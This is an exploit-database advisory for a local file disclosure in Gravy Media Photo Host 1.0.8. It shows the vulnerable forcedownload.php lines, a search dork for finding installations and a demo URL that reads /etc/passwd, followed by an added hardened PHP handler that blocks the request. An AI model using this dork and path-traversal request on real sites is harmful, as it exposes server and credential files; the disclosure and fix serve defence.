Gravy Media Photo Host 1.0.8 - Local File Disclosure

Author: Lo$er
type: webapps
platform: php
date_added: 2009-06-21  
verified: 1  
codes: OSVDB-55280;CVE-2009-2184  

raw file: 8996.txt  
==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================

Vendor: http://www.gravy-media.com/
Download: register to download
Dork: "Powered by Gravy Media"
Discovered By: Lo$er

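====Vulnerable code (forcedownload.php)====
$filename = $_GET['file'];   // line 27: request parameter taken as-is, no validation

readfile("$filename");       // line 70: that path is read and sent to the client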
====Demo====

http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd

# milw0rm.com [2009-06-22]
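
A hardened form of the download handler, added here as an example; it is not the vendor's code and not part of the original advisory. The requested name is reduced to a bare file name, resolved with realpath(), and served only if the result lies inside the upload directory. `UPLOAD_DIR`, its path and `resolve_download()` are assumptions, as is the premise that uploads are stored flat in one directory.

```php
<?php
// Added example, not Gravy Media's code. UPLOAD_DIR and resolve_download()
// are hypothetical; the application's real storage path is not on the page.
const UPLOAD_DIR = '/var/www/photohost/uploads';

/** Map a user-supplied name to a regular file inside $baseDir, or null. */
function resolve_download(string $requested, string $baseDir): ?string
{
    // Reject empty names and NUL bytes (old PHP versions truncated paths at NUL).
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // basename() drops every directory component, so "/etc/passwd" becomes
    // "passwd" and "../../x" becomes "x"; the lookup is relative to $base only.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . basename($requested));
    // realpath() follows symlinks, so re-check that the target is still under
    // $base and is a regular file before it is ever opened.
    if ($candidate === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0
        || !is_file($candidate)) {
        return null;
    }
    return $candidate;
}

// Request handling runs only under a web SAPI, so the file can also be
// included from the command line to exercise resolve_download() directly.
if (PHP_SAPI !== 'cli') {
    $file = $_GET['file'] ?? '';
    // ?file[]=x arrives as an array; treat anything but a string as not found.
    $path = is_string($file) ? resolve_download($file, UPLOAD_DIR) : null;
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: application/octet-stream');
    header("Content-Disposition: attachment; filename*=UTF-8''" . rawurlencode(basename($path)));
    header('Content-Length: ' . filesize($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}
```

With this check, the `file=%2Fetc%2Fpasswd` request from the demo resolves to `passwd` inside the upload directory and returns 404 unless an upload with that name exists.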